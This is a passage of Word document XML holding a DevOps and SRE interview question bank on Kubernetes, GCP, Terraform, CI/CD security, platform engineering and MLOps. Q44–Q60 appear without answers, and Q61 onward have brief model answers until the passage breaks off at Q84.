        <w:t>Q44. Kubernetes KEDA event scaling: How would you autoscale queue consumers with KEDA while preventing duplicate work, downstream overload, scale-to-zero delays, and retry storms?</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KEDA event scaling: How would you autoscale queue consumers with KEDA while preventing duplicate work, downstream overload, scale-to-zero delays, and retry storms?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q45. Kubernetes CNI debugging: Pod-to-pod traffic fails only across nodes. How would you isolate CNI, routing, encapsulation, MTU, network policy, conntrack, and cloud firewall problems?</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CNI debugging: Pod-to-pod traffic fails only across nodes. How would you isolate CNI, routing, encapsulation, MTU, network policy, conntrack, and cloud firewall problems?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q46. Kubernetes DNS at scale: CoreDNS latency and SERVFAIL errors increase during traffic spikes. How would you investigate query amplification, ndots behavior, caching, upstream resolvers, autoscaling, and NodeLocal DNSCache?</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DNS at scale: CoreDNS latency and SERVFAIL errors increase during traffic spikes. How would you investigate query amplification, ndots behavior, caching, upstream resolvers, autoscaling, and NodeLocal DNSCache?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q47. Kubernetes conntrack exhaustion: Services intermittently time out while Pods and nodes look healthy. How would you confirm conntrack exhaustion, identify the traffic pattern, mitigate impact, and prevent recurrence?</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conntrack exhaustion: Services intermittently time out while Pods and nodes look healthy. How would you confirm conntrack exhaustion, identify the traffic pattern, mitigate impact, and prevent recurrence?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q48. Kubernetes Gateway API migration: How would you migrate production traffic from Ingress to Gateway API while preserving TLS, routing behavior, policy ownership, observability, rollback, and zero downtime?</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Gateway API migration: How would you migrate production traffic from Ingress to Gateway API while preserving TLS, routing behavior, policy ownership, observability, rollback, and zero downtime?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q49. Kubernetes zero-trust networking: Design default-deny ingress and egress controls for a multi-tenant cluster. How would you handle DNS, external APIs, service mesh mTLS, policy testing, and emergency access?</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zero-trust networking: Design default-deny ingress and egress controls for a multi-tenant cluster. How would you handle DNS, external APIs, service mesh mTLS, policy testing, and emergency access?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q50. Kubernetes admission webhook outage: A validating webhook is timing out and blocking all deployments. How would you restore service safely and redesign failurePolicy, timeouts, replicas, certificates, and break-glass controls?</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admission webhook outage: A validating webhook is timing out and blocking all deployments. How would you restore service safely and redesign failurePolicy, timeouts, replicas, certificates, and break-glass controls?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q51. Kubernetes RBAC privilege escalation: How would you detect and prevent indirect privilege escalation through permissions such as creating Pods, binding roles, impersonating users, reading Secrets, or modifying admission webhooks?</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RBAC privilege escalation: How would you detect and prevent indirect privilege escalation through permissions such as creating Pods, binding roles, impersonating users, reading Secrets, or modifying admission webhooks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q52. Kubernetes service account token security: How would you replace long-lived tokens with projected bound tokens and external workload identity while controlling audience, expiration, automounting, and token rotation?</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service account token security: How would you replace long-lived tokens with projected bound tokens and external workload identity while controlling audience, expiration, automounting, and token rotation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q53. Kubernetes StatefulSet recovery: A zonal failure leaves a quorum-based StatefulSet unavailable and volumes cannot attach in another zone. How would you recover while protecting consistency, ordering, identity, and RPO?</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StatefulSet recovery: A zonal failure leaves a quorum-based StatefulSet unavailable and volumes cannot attach in another zone. How would you recover while protecting consistency, ordering, identity, and RPO?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q54. Kubernetes CSI failure: PVC provisioning and volume attachment are intermittently failing. How would you debug StorageClass parameters, CSI controller and node plugins, topology, quotas, finalizers, and cloud-provider events?</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CSI failure: PVC provisioning and volume attachment are intermittently failing. How would you debug StorageClass parameters, CSI controller and node plugins, topology, quotas, finalizers, and cloud-provider events?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q55. Kubernetes CRD evolution: You own an operator whose CustomResourceDefinition schema must change without breaking stored objects. How would you handle versioning, conversion webhooks, storage versions, defaulting, and rollback?</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CRD evolution: You own an operator whose CustomResourceDefinition schema must change without breaking stored objects. How would you handle versioning, conversion webhooks, storage versions, defaulting, and rollback?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q56. Kubernetes operator reconciliation: How would you design an idempotent controller reconciliation loop with finalizers, status conditions, retries, leader election, and protection against hot loops?</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operator reconciliation: How would you design an idempotent controller reconciliation loop with finalizers, status conditions, retries, leader election, and protection against hot loops?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q57. Kubernetes GitOps disaster recovery: Git is available but a production cluster and its GitOps controller are lost. How would you rebuild cluster dependencies, secrets, CRDs, operators, and workloads in the correct order and prove recovery objectives?</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GitOps disaster recovery: Git is available but a production cluster and its GitOps controller are lost. How would you rebuild cluster dependencies, secrets, CRDs, operators, and workloads in the correct order and prove recovery objectives?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q58. Kubernetes multi-cluster failover: Design active-active or active-passive application delivery across clusters. How would you solve traffic steering, session state, data consistency, configuration drift, identity, and failback?</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multi-cluster failover: Design active-active or active-passive application delivery across clusters. How would you solve traffic steering, session state, data consistency, configuration drift, identity, and failback?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q59. Kubernetes noisy neighbor: One tenant causes CPU throttling, memory pressure, and control-plane churn for others. How would you combine quotas, LimitRanges, priority classes, node isolation, fair queuing, and chargeback?</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noisy neighbor: One tenant causes CPU throttling, memory pressure, and control-plane churn for others. How would you combine quotas, LimitRanges, priority classes, node isolation, fair queuing, and chargeback?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q60. Kubernetes forensic debugging: A container was killed and recreated before engineers captured evidence. What logs, events, audit records, runtime data, core dumps, and ephemeral-container workflows would you establish for post-incident analysis?</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Kubernetes forensic debugging: A container was killed and recreated before engineers captured evidence. What logs, events, audit records, runtime data, core dumps, and ephemeral-container workflows would you establish for post-incident analysis?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q61. Compute Engine migration: How would you migrate legacy Compute Engine workloads to GKE or Cloud Run, and what factors would make you keep them on VMs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Containerize the application, validate it runs correctly in a container locally and in a staging cluster, and migrate incrementally (one service at a time behind a load balancer) rather than a big-bang cutover. Keep workloads on VMs when they have kernel-level dependencies, licensing tied to physical/VM hosts, require GPU passthrough configurations not well supported in your container platform, or are legitimately being decommissioned soon and not worth the migration investment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q62. Pub/Sub exactly-once: A team expects exactly-once processing from Pub/Sub. How would you explain reality and design idempotency, ordering keys, retries, and DLQs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Explain that Pub/Sub guarantees at-least-once delivery by default (exactly-once delivery is available as a feature but still requires idempotent processing for true correctness under retries), so the application must be designed to safely process the same message twice - typically via a deduplication key checked against a store before applying side effects. Use ordering keys only where sequence genuinely matters (it limits throughput per key), and configure a dead-letter topic with a bounded max delivery attempt count so a poison message doesn't loop forever.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q63. Private Service Connect: How would you use Private Service Connect for private service access, and how would you debug connectivity failures?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use Private Service Connect to expose a service (yours or a managed GCP service) privately to consumer VPCs without VPC peering, publishing a service attachment on the producer side and creating an endpoint in the consumer VPC. Debug connectivity by checking the PSC endpoint status (accepted/pending/rejected), verifying firewall rules allow traffic to the PSC endpoint IP, confirming DNS resolves to the private endpoint rather than a public address, and checking the producer-side service attachment's connection acceptance list.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q64. Terraform secrets: How would you prevent secrets from leaking into Terraform state, plans, logs, and CI/CD output?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Avoid passing raw secret values as Terraform variables where possible; instead reference secrets already stored in Secret Manager and grant the resource access to fetch them at runtime rather than embedding the value in Terraform config. Mark sensitive variables and outputs with `sensitive = true` so they're redacted from CLI output and plan summaries, store state in an encrypted remote backend with restricted access (state still contains secret values in plaintext), and ensure CI logs mask any secret-adjacent output.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q65. Terraform import: A team created resources manually and wants them managed by Terraform. How would you plan imports and reduce risk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Write the Terraform resource configuration to match the existing resource's actual settings first, then use `terraform import` (or the newer import blocks) to bring it under state management, and immediately run `terraform plan` to confirm zero diff - any drift shown means your config doesn't yet match reality and needs adjustment before proceeding. Import resources incrementally, not all at once, and require a plan review before the first real apply against newly-imported resources to catch any unintended changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q66. GitHub Actions security: How would you secure GitHub Actions for cloud deployments using OIDC, environments, approvals, least privilege, and secret handling?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use OIDC federation so GitHub Actions authenticates to GCP with short-lived tokens instead of long-lived service account keys stored as secrets, scope the associated service account to only the permissions that workflow needs, and use GitHub Environments with required reviewers for deployments to production. Pin action versions to a commit SHA (not a mutable tag) to prevent supply-chain tampering, and ensure secrets are scoped to the specific environment rather than available to every workflow in the repo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q67. Release rollback: A canary deployment passes technical metrics but business metrics drop. How would you decide rollback versus continue?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Treat business metric regression as seriously as technical metric regression - a canary that's technically healthy but drives down conversion or revenue is still a failed release. Roll back immediately if the business impact is significant and ongoing, since the cost of staying live and investigating usually exceeds the cost of a quick rollback; only continue investigating live if the metric drop is small, ambiguous, or plausibly caused by something unrelated to the release (seasonality, an unrelated incident) that you can verify quickly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q68. Toil reduction: How would you identify operational toil in a platform team and turn it into automation backlog?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Track recurring manual work explicitly - ticket categories, time spent per task type, and repeated Slack requests - to find the highest-frequency, highest-effort toil rather than guessing. Prioritize automation candidates by (frequency x time saved) versus build effort, and treat toil reduction as a real backlog item with the same rigor as feature work, since it competes for the same engineering time and needs to be justified with expected ROI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q69. Chaos testing: How would you introduce chaos engineering safely for GKE workloads and what failure modes would you test first?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start in staging with well-understood, low-blast-radius experiments - killing a single pod, simulating a node drain - before ever running chaos experiments in production, and always have a clear abort mechanism. Test the failure modes most likely to actually occur first: pod crashes, node failures, and dependency timeouts, since these validate whether your health checks, PDBs, and retry logic actually work as designed rather than just looking correct on paper.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q70. Logging cost: Cloud Logging cost is growing quickly. How would you reduce cost while preserving incident debugging value?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use log exclusion filters to drop high-volume, low-value logs (health check noise, verbose debug logs in production) before they're ingested and billed, and route logs you still want to keep long-term to cheaper storage (a Cloud Storage sink) rather than paying Cloud Logging's retention rate for everything. Keep sufficient structured context in the logs you do keep (request IDs, error details) so reducing volume doesn't reduce the ability to actually debug an incident when it matters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q71. Alert ownership: How would you ensure every alert has an owner, runbook, SLO relationship, and actionable threshold?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Require every new alert to be tied to a specific team/on-call rotation, link to a runbook describing the response steps (not just the symptom), and justify its threshold against an SLO or known user-impact signal rather than an arbitrary number. Periodically audit alerts that fire frequently without action taken or that page the wrong team, and remove or fix alerts that don't meet this bar, since unowned or non-actionable alerts are what causes alert fatigue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q72. SCC operations: How would you operationalize Security Command Center findings into ticketing, prioritization, remediation, and reporting?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Pipe SCC findings into your ticketing system automatically with severity-based routing and SLAs, prioritize based on both severity and exploitability/exposure (an internet-facing critical finding outranks an internal medium one), and track remediation to actual verified closure, not just ticket status. Provide a rolling report to leadership on open findings by age and severity so unresolved risk stays visible rather than accumulating silently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q73. SLSA/provenance: How would you explain SLSA, provenance, and signed artifacts to a team building a secure delivery platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Explain SLSA as a framework that gives you graduated confidence that an artifact was built the way you think it was - from basic build tracking to fully verified, tamper-resistant build provenance - and provenance as the metadata proving where and how an artifact was built (source commit, build system, inputs). Signed artifacts (via cosign/Sigstore) let a deployment target cryptographically verify an image wasn't tampered with after the CI pipeline built it, which is what Binary Authorization enforces before allowing deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q74. Golden path adoption: Teams avoid your golden path and create their own pipelines. How would you understand why and improve adoption?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Talk directly to the teams bypassing it rather than assuming - the golden path is usually avoided because it's missing a capability they need, too rigid for their use case, or has a worse developer experience than rolling their own. Fix the actual gap, involve early adopters in shaping the next iteration so it reflects real needs, and measure adoption as a product metric you actively improve rather than mandating compliance, which tends to produce quiet workarounds instead of genuine adoption.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q75. Service catalog: How would you design service ownership metadata, dependency mapping, and production readiness status in a service catalog?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Require every service to register ownership (team, on-call, Slack channel), a dependency list (what it calls and what calls it) ideally derived automatically from tracing data rather than hand-maintained, and a production-readiness status (checklist of reliability/security gates passed). Make the catalog the source of truth other tooling reads from (alerting routes, on-call paging, cost attribution) so it stays accurate through use rather than becoming stale documentation nobody updates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q76. Batch inference: How would you design batch inference on GCP using GKE, Cloud Run jobs, Vertex AI, or Composer, and what tradeoffs matter?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use Cloud Run jobs or GKE Jobs/CronJobs for straightforward scheduled batch scoring with moderate scale, Vertex AI batch prediction for a fully managed experience tightly integrated with the Model Registry, and Cloud Composer/Airflow when the batch job is one step in a larger multi-stage pipeline with dependencies. The tradeoff is operational simplicity versus control - managed Vertex AI batch prediction requires the least maintenance but the least customization; GKE Jobs give full control at the cost of managing scaling and retries yourself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q77. LLM app operations: How would you operate an LLM-backed service in production, including latency, cost, prompt changes, safety, and observability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Monitor latency (time to first token and total generation time separately), cost per request/user, and treat prompt changes with the same rigor as code changes - versioned, tested, and rolled out gradually. Layer in safety checks (input/output filtering for harmful content, PII redaction) as a non-bypassable part of the request path, and instrument tracing that captures the full request - retrieved context, prompt, model version, response - so any bad output can be debugged after the fact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q78. FinOps showback: How would you implement cost allocation, labels, budgets, showback, and team accountability across GCP projects?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Enforce required labels (team, cost-center, environment) via org policy so cost can be attributed accurately, set budgets with alerting thresholds per project/team so overspend is caught early rather than at month-end, and publish a regular showback report so each team sees their own spend trend without necessarily charging it back financially at first. Move from showback to real chargeback once teams trust the attribution accuracy and have had time to adjust behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q79. Incident behavioral: Tell me about a time you disagreed with developers during a production incident. How did you handle it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Structure this as a specific story: describe the disagreement (e.g. over whether to roll back versus continue debugging live), explain how you made the case for your position using data or risk reasoning rather than authority, and describe how the disagreement was resolved - ideally showing you prioritized user impact and incident resolution speed over being right, and that you followed up afterward to align on the decision framework for next time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q80. Leadership behavioral: How would you mentor junior engineers on Kubernetes troubleshooting and Terraform safety?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Pair on real incidents and change reviews rather than only lecturing - walk through your own debugging process out loud so the reasoning (not just the command) transfers, and give juniors low-risk but real production troubleshooting opportunities with you as a safety net. For Terraform safety specifically, enforce the habit of always reading the plan output before approving an apply, and use post-mistake moments as teaching opportunities rather than blame, since that's when the lesson lands hardest.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q81. Design tradeoff: When would you intentionally choose a simpler architecture over a highly available multi-region design?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Choose simplicity when the service's actual availability requirement doesn't justify multi-region complexity and cost - an internal tool with a few hours of acceptable downtime a year doesn't need active-active multi-region. Multi-region adds real operational cost (data consistency complexity, failover testing burden, higher baseline spend), so the decision should be driven by the actual business SLA and cost of downtime, not a default assumption that more resilience is always better.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q82. Communication: Explain a complex GKE outage to a non-technical product leader in two minutes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Lead with impact and status, not mechanism: what broke, who was affected, for how long, and what's the current state (fixed, mitigated, ongoing). Use a plain-language analogy for the technical cause only if it helps understanding (e.g. 'a routing update caused traffic to be sent to servers that weren't ready yet'), skip Kubernetes-specific terminology entirely, and close with what's being done to prevent recurrence and when a full writeup will be available.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q83. Drift monitoring: In production, how would you detect data drift, concept drift, and schema drift, and how would each one trigger different actions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Data drift (input distribution shifting) is detected by comparing feature statistics against a training baseline using tests like population stability index; concept drift (the relationship between inputs and target changing) shows up as accuracy degradation on labeled feedback data even if inputs look stable; schema drift (fields changing type, appearing, or disappearing) is caught by validating incoming data against an expected schema before it reaches the model. Data and schema drift typically trigger a pipeline alert and pause, while concept drift triggers a retraining evaluation, since it usually means the underlying real-world pattern has genuinely changed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q84. Model registry: How would you design model versioning, approval workflow, rollback, lineage, and auditability using MLflow Registry or Vertex AI Model Registry?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
